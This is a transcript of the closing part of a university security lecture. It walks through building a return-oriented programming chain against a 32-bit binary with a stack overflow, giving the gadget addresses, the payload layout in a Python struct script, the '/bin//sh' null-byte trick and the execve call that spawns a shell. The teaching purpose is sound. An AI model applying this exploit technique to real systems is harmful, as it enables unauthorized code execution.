/bin/sh somewhere, we need some gadget that will write some data into memory and then return. So we're going to search, and we will find a gadget such that if we jump to it, if we set the saved eip to 0x0809a67d, these two instructions happen. So what happens here?
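As a rough sketch of the goal state just described, the following Python builds the register values and the bytes that would need to sit in writable memory for the execve call. The .data address is the one read out in the lecture; the layout (argv array placed directly after the string) is a simplifying assumption for this illustration and is not necessarily the layout the final exploit uses. `execve_plan` is a hypothetical helper name.

```python
import struct

SYS_EXECVE = 0xB    # execve's system call number on 32-bit x86 Linux
DATA = 0x080EA060   # .data address as read out in the lecture


def execve_plan(base):
    """Return (registers, memory image) for execve("/bin/sh", ["/bin/sh"], NULL)."""
    path = b"/bin/sh\x00"                 # 8 bytes including the null terminator
    argv_addr = base + len(path)          # assumed: array sits right after the string
    argv = struct.pack("<II", base, 0)    # [pointer to the path, NULL]
    regs = {"eax": SYS_EXECVE, "ebx": base, "ecx": argv_addr, "edx": 0}
    return regs, path + argv


regs, memory = execve_plan(DATA)
for name in ("eax", "ebx", "ecx", "edx"):
    print(name, hex(regs[name]))
print(memory)
```

Nothing here touches a real process; it only spells out what the gadgets have to achieve before `int 0x80` is reached.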
So what are the semantics of this little gadget? What's the first instruction? Move eax into edx? Yeah, very close. Move the value of eax where? What do those parentheses mean? Into the memory pointed to by edx. Yeah, so if there's a memory address in edx, then we will copy whatever's in eax into the memory that edx points to, and then return. Seems very simple, yeah? So without parentheses, if the value 10 is in eax, we will copy 10 into edx. After that instruction executes, the edx register will have the exact same value as eax. With the parentheses like this, we are going to dereference edx. So we're going to say, whatever edx points to, so it points to some memory region, we will copy 10 into that memory region. The edx register does not change; the memory that edx points to changes. So this allows us to change memory, essentially. If we assume we can control eax and edx, we can now write whatever we want to wherever we want in memory. So assume for now, and we'll show how we can get there, that we can control the eax register and the edx register, and we know we can control the instruction pointer, so we can force the instruction pointer to go here. So if we assume we have eax and edx, we can write a value somewhere in memory, and then what will happen at this return? What does the return do? Yeah, it sets the instruction pointer to be whatever the value is on the stack at that point. Who controls the stack in a buffer overflow? We do, the attacker. This means that after this little gadget happens, we can make it go wherever else we want, maybe to another gadget that does something. So we could do something very nice. Let's say the register eax holds the data /bin, and edx holds the address of .data, 0x080ea060. Then after we execute this gadget, we will have copied /bin to this memory location.
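The difference between copying into a register and storing through a register can be sketched with a dictionary for registers and a byte array for memory. This is a toy model, not an x86 emulator; `mov_reg` and `mov_store` are hypothetical helper names, and the 8-byte memory region starting at the .data address is an assumption for illustration.

```python
import struct

DATA = 0x080EA060  # base address of the modelled writable region (from the lecture)


def mov_reg(regs, dst, src):
    """Model of `mov %src, %dst`: the destination register itself changes."""
    regs[dst] = regs[src]


def mov_store(regs, mem, ptr_reg, src):
    """Model of `mov %src, (%ptr_reg)`: memory changes, the pointer register does not."""
    offset = regs[ptr_reg] - DATA
    mem[offset:offset + 4] = struct.pack("<I", regs[src])


# Without parentheses: edx ends up holding 10.
regs_a = {"eax": 10, "edx": DATA}
mov_reg(regs_a, "edx", "eax")
print(regs_a["edx"])            # 10

# With parentheses: edx still points at DATA, and the 4 bytes there now hold 10.
regs_b = {"eax": 10, "edx": DATA}
mem = bytearray(8)
mov_store(regs_b, mem, "edx", "eax")
print(hex(regs_b["edx"]), bytes(mem[:4]))
```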
So we're trying to build up to being able to write the string /bin/sh. So we need more gadgets. We can't control edx yet, and we can't control eax. We need something else. So we need to get our data into edx. It turns out there's a very nice instruction: pop edx. Pop does what? It takes the value off the stack and moves it into that register. Who controls the stack? We control the stack. So now we can put whatever value we want onto the stack and jump to this gadget; it will pop that value off the stack into edx, followed by a return, which will then go wherever we want after that. So using this, now we can control edx and put whatever value we want in it. We need another gadget to put whatever we want in eax, and then we're able to write anything wherever we want. So let's look at what happens, just as a little example. We're going to run this program. We're going to pass in 50 a's, which fills the buffer. And then what are the next four bytes going to be overwriting? The base pointer. And the next four? The instruction pointer. Why is this backwards? Yeah, because it's little endian. So this means I'm going to go to 0x0806E918. That's what I've written into the saved return address. And then what's this next thing on the stack? This will be whatever we put into edx. So this gadget, let's go back slightly, yeah, is at this address. So we're showing how one gadget works. When we run this, we'll get essentially to this point of the program. It's exactly the same as what we had before the strcpy. So we have written the 50 a's into our buffer, right? Then we overwrote the saved base pointer with 65, 64, 63, 62. And then we overwrote the return address with 0x0806E918. And then after that, the reverse: 62, 63, 64, 65. So strcpy happens and we know that nothing crashes here. We've just overwritten memory.
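The single-gadget input described above can be sketched with Python's struct module. The gadget address is the one read out in the lecture; the byte string `bcde` for the saved base pointer and the value 0x62636465 for edx follow my reading of the walkthrough and should be treated as assumptions. This uses Python 3 byte strings.

```python
import struct

POP_EDX_RET = 0x0806E918  # `pop edx; ret` gadget address as read out in the lecture

payload = b"a" * 50                         # fills the 50-byte buffer
payload += b"bcde"                          # overwrites the saved base pointer
payload += struct.pack("<I", POP_EDX_RET)   # overwrites the saved return address
payload += struct.pack("<I", 0x62636465)    # next stack word: popped into edx

# "<I" means a 32-bit unsigned integer, least significant byte first.
print(struct.pack("<I", POP_EDX_RET))              # b'\x18\xe9\x06\x08'
print(hex(struct.unpack("<I", b"bcde")[0]))        # 0x65646362
print(len(payload))                                # 62
```

The address looks backwards in the raw bytes because x86 stores the low-order byte at the lowest address, which is why the saved base pointer reads as 65, 64, 63, 62 when displayed as a word.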
So we'll walk through these last instructions here. Moving 10 into eax; a leave will again move the base pointer into the stack pointer and then do a pop EBP. So the base pointer is now 65, 64, 63, 62, our value that we passed in. And is it going to crash on this return? Why not? This is an actual address that is executable. It's a real address in the program. So we return from here, and we're going to start executing there. Does the program know that it's now executing some weird code halfway through a function in libc? No, all it cares about is executing these instructions. So now it's going to do pop edx. What's going to happen? 62, 63, 64, 65 goes into edx. And then it's going to return. Where's it going to return to? Yeah, it's going to return to whatever is next on the stack. So here, this was the value that got popped, and whatever comes after it is the next return address. So essentially, we have a gadget here that, when we jump to it, will put whatever the next value is into edx, and then jump to whatever address we put after that. So with this gadget of pop edx, return, we can put a value into edx. Now we need a gadget to put our data into eax. It turns out there's a really nice gadget at 0x080bb6b6 of pop eax, return. And there are a lot of other gadgets. We also need to control the ebx register to call execve, and we need to control the ecx register. We'll see there are other things that will come in handy, like clearing out eax: XORing a register with itself will clear it out. Then incrementing a register, and finally calling int 0x80. We need int 0x80 to make a system call into the kernel. So now we can actually use this to completely build up our shellcode. We can keep doing this, but it gets kind of insane writing it like this. There are tools and better ways. We can actually write this as a Python script.
So without using anything fancy, all we're using is the struct module, to be able to tell Python that we want certain things in little or big endian. We're going to create our payload, p. We're going to first have 50 a's and then bcde. So where is that going? That's going to be our input as argv[1] to this program. So what is that overflow going to do? Yeah, it's going to first write just 50 a's and then overwrite the base pointer with bcde. And now we need to copy /bin to .data. We already saw this; now we're appending to p, our payload. We're going to pack, and again, you can ignore the Python syntax. This pack means turn this number into little endian, so we don't have to do that by hand anymore. That's the nice thing about doing it this way. And so we're going to jump to this gadget. We have a nice comment here that tells us exactly what this gadget is: pop edx, return. What do we want in edx? The address of .data. So we're going to first copy the string /bin into .data. This is the address of .data that we learned from looking at the ELF header. Now we need to control eax, because we need the string /bin there. So again, remember, just like before, whatever is after this on the stack is where this gadget is going to return to and execute from. And we control the stack. So now we can make it go to pop eax, return, which will take whatever the next value is, in this case /bin, which is what we want, and move that into eax. At this point the value in the eax register will be that string, /bin, and the value inside edx will be the address of .data. So now when we jump to our gadget that copies eax into wherever edx is pointing, that will actually change the memory of the program and write the value /bin. Does this make sense? So now we need to copy, yeah?
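A minimal sketch of the payload built so far might look like the following. It is written for Python 3 with byte strings, which may differ from the script shown on the slides. The four addresses are the ones read out in the lecture (as transcribed, so treat them as assumptions), and `write4` is a hypothetical helper introduced here to group the five appended words.

```python
from struct import pack

POP_EDX_RET = 0x0806E918      # pop edx ; ret
POP_EAX_RET = 0x080BB6B6      # pop eax ; ret
MOV_EDX_EAX_RET = 0x0809A67D  # mov [edx], eax ; ret
DATA = 0x080EA060             # address of .data


def write4(addr, four_bytes):
    """Chain fragment that writes exactly four bytes to addr."""
    assert len(four_bytes) == 4
    chain = pack("<I", POP_EDX_RET)      # next stack word goes into edx
    chain += pack("<I", addr)            # edx = destination address
    chain += pack("<I", POP_EAX_RET)     # next stack word goes into eax
    chain += four_bytes                  # eax = the four data bytes
    chain += pack("<I", MOV_EDX_EAX_RET) # store eax at the address in edx
    return chain


p = b"a" * 50          # fill the buffer
p += b"bcde"           # saved base pointer
p += write4(DATA, b"/bin")

print(len(p))                # 74
print(b"\x00" in p)          # False: strcpy would copy the whole payload
```

The null-byte check matters because strcpy stops at the first zero byte, so any zero inside the payload would cut the chain short.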
So I understand up until where we overrun the base pointer and we feed in an address that's actually executable. Yes. So now we're essentially reusing little tiny bits of code to do things that we want them to do. And sorry, the other important thing is that each of these little bits of code is taking values off the stack and getting them into registers, because we control the stack. So we've already moved, you know, the address of .data into edx at this point right here. Essentially these little three, four, five lines are all about doing that. Yeah? And so what's in eax? So the way to read this is that it will pop whatever the next value is into eax. So this will pop /bin into eax. We need the string /bin/sh somewhere in memory, because we want to call execve with a pointer to that string. We're using this fixed memory location because we saw in the ELF header that global variables are essentially always stored at this location. We know this is a fixed memory location that never changes, so we can store our data there. So what we're trying to do is get the string /bin/sh into memory. We have a little bit of a problem, because if we did /sh followed by zero, we'd have a null byte. So we're going to use a nice trick of adding an extra slash to our sh. Our string will technically be /bin//sh. Luckily, the OS doesn't care about that at all; extra slashes are redundant. So again, we need to copy this value into the address of .data plus four. What's currently at .data is /bin, so now we want to write the rest of our string at four past that. We need essentially the same five lines again, but changed: we use the same gadget of pop edx, return, and pass in the address of .data plus four; then pop eax, return, with //sh; and then this gadget to copy that.
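The null-byte problem and the extra-slash trick can be checked with a few lines of Python. `strcpy_view` is a hypothetical helper that models what a C string copy would see, namely everything before the first zero byte; the trailing `MORE` bytes stand in for the rest of the chain. `posixpath.normpath` is used only to illustrate that a doubled slash inside a path names the same file.

```python
import posixpath


def strcpy_view(data):
    """Bytes a C string copy would transfer: everything before the first null."""
    return data.split(b"\x00", 1)[0]


with_null = b"/bin" + b"/sh\x00" + b"MORE"   # "/sh" padded to 4 bytes with a null
with_slash = b"/bin" + b"//sh" + b"MORE"     # "/sh" padded to 4 bytes with a slash

print(strcpy_view(with_null))    # b'/bin/sh'  (the rest of the payload is lost)
print(strcpy_view(with_slash))   # b'/bin//shMORE'
print(posixpath.normpath("/bin//sh"))  # /bin/sh
```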
So these five lines, if you think of them atomically, essentially say copy the string //sh into the address of .data plus four. We've already copied /bin to .data. So using the pointer to .data, we have the string /bin//sh. And now we need to zero out the data after that. Yeah, so now we need to put in the null. Exactly. That's what we're going to do right here. This is zeroing out the address of .data plus eight. We're going to set edx to be the address of .data plus eight, right, so the four bytes that are after the string. We're going to XOR eax with itself, which makes it zero. And then we jump to our write gadget. So now we have a null-terminated string in memory, /bin//sh. That's the first argument to the execve system call. We now need to build up this argv vector. I think this is getting a little bit redundant: we essentially use our gadgets to set up the rest of these vectors. We have a null there as well. And now we call execve with the address of .data, the address of .data plus 12, and the address of .data plus eight. All this fun stuff. And now we need to set eax to be 11. You can see it's kind of ridiculous. We clear out eax to zero and then we increment it 11 times. So we just do this 11 times to get eax to be 11, and then call int 0x80. Okay. And in the final part of our Python script, we print out this payload, which we can then pass in as the argument. So let's actually walk through this and it will make a lot more sense. We can create a Python script called exploit.py. We can run it and set a breakpoint right at the end of the main function. So now we've overwritten a ton of the stack, right? Not just a little bit; we control the vast majority of the stack. So at the return, it's going to go to this 0806 E910, which was our first gadget.
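The whole chain can be sketched as a toy simulation that pops words off a list the way `ret` and `pop` would. This is not an x86 emulator, and it is not the script from the slides. The first three gadget addresses and the .data address are the ones read out in the lecture; the remaining gadget addresses are hypothetical placeholders, and the memory layout (string at .data, null at +8, argv at +12) is my reading of the description above.

```python
import struct

DATA = 0x080EA060
POP_EDX, POP_EAX, STORE = 0x0806E918, 0x080BB6B6, 0x0809A67D   # from the lecture
XOR_EAX, INC_EAX = 0x08051111, 0x08052222                      # hypothetical
POP_EBX, POP_ECX, INT80 = 0x08053333, 0x08054444, 0x08055555   # hypothetical

GADGETS = {
    POP_EDX: ("pop", "edx"), POP_EAX: ("pop", "eax"),
    POP_EBX: ("pop", "ebx"), POP_ECX: ("pop", "ecx"),
    STORE: ("store",), XOR_EAX: ("xor",), INC_EAX: ("inc",), INT80: ("int80",),
}


def run(chain):
    """Execute gadget words in order; stop when the int 0x80 gadget is reached."""
    regs = {"eax": 0xDEADBEEF, "ebx": 0, "ecx": 0, "edx": 0}
    mem = bytearray(b"\xff" * 24)            # writable region starting at DATA
    sp = 0
    while sp < len(chain):
        op = GADGETS[chain[sp]]              # `ret` pops the next gadget address
        sp += 1
        if op[0] == "pop":                   # pop <reg>: take the next stack word
            regs[op[1]] = chain[sp]
            sp += 1
        elif op[0] == "store":               # mov [edx], eax
            off = regs["edx"] - DATA
            mem[off:off + 4] = struct.pack("<I", regs["eax"])
        elif op[0] == "xor":                 # xor eax, eax
            regs["eax"] = 0
        elif op[0] == "inc":                 # inc eax
            regs["eax"] = (regs["eax"] + 1) & 0xFFFFFFFF
        elif op[0] == "int80":               # system call: stop and report state
            break
    return regs, mem


def word(four_bytes):
    return struct.unpack("<I", four_bytes)[0]


def write4(addr, value):
    return [POP_EDX, addr, POP_EAX, value, STORE]


chain = write4(DATA, word(b"/bin")) + write4(DATA + 4, word(b"//sh"))
chain += [POP_EDX, DATA + 8, XOR_EAX, STORE]      # null terminator (also empty envp)
chain += write4(DATA + 12, DATA)                  # argv[0] = pointer to the string
chain += [POP_EDX, DATA + 16, XOR_EAX, STORE]     # argv[1] = NULL
chain += [POP_EBX, DATA, POP_ECX, DATA + 12, POP_EDX, DATA + 8]
chain += [XOR_EAX] + [INC_EAX] * 11 + [INT80]     # eax = 11, then int 0x80

regs, mem = run(chain)
print({name: hex(value) for name, value in regs.items()})
print(bytes(mem[:12]))
```

Clearing eax and incrementing it 11 times avoids ever placing the value 11 on the stack, which as a 32-bit word would contain three null bytes.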
So going there, these are all the gadgets just kind of laid out next to each other. So what is it going to do? Pop edx. So pop that value off the stack. Now edx has the address of .data. Return from that. So now we start executing at this next gadget, which is pop eax. Pop that value off the stack, return. So now we have the string /bin in eax. We're going to now go to this gadget to copy that there. Return. Do the same thing for the next string, //sh. Then we're going to XOR eax, so make eax 0. Now we're going to write out 0 to the address of .data plus 8. We keep going through this. So now, right before we get to the int 0x80, we can set a breakpoint. We can look at the string that's at this address. We can see that this is the string /bin//sh. We can look at the two words here to make sure that our arguments are set up correctly. And we can now see, when we continue, that we've executed this new program, /bin/dash. Using little bits of the program's own code, we've tricked it into exec'ing /bin/sh with these arguments. So this is completely independent of any address space layout randomization. This is a super cool technique. The nice thing is you don't have to do this by hand. There are automated tools to do this kind of exploitation. pwntools, ROPgadget, and Ropper are all tools that you can run on a binary that will definitely tell you all the different gadgets and sometimes will automatically build the ROP chain for you. So, you know, how we actually built that chain was you can run the binary through this tool and it will try to build it for you. Also on this note, pwntools is a very comprehensive library used by a lot of the top CTF teams. That's actually the end of this material. So I will not be here on Thursday. I'm going to try to get a guest speaker who's a security professional, but we'll keep you posted.
So what's going to happen on Thursday? No office hours today. It's been a good semester. See y'all at the final.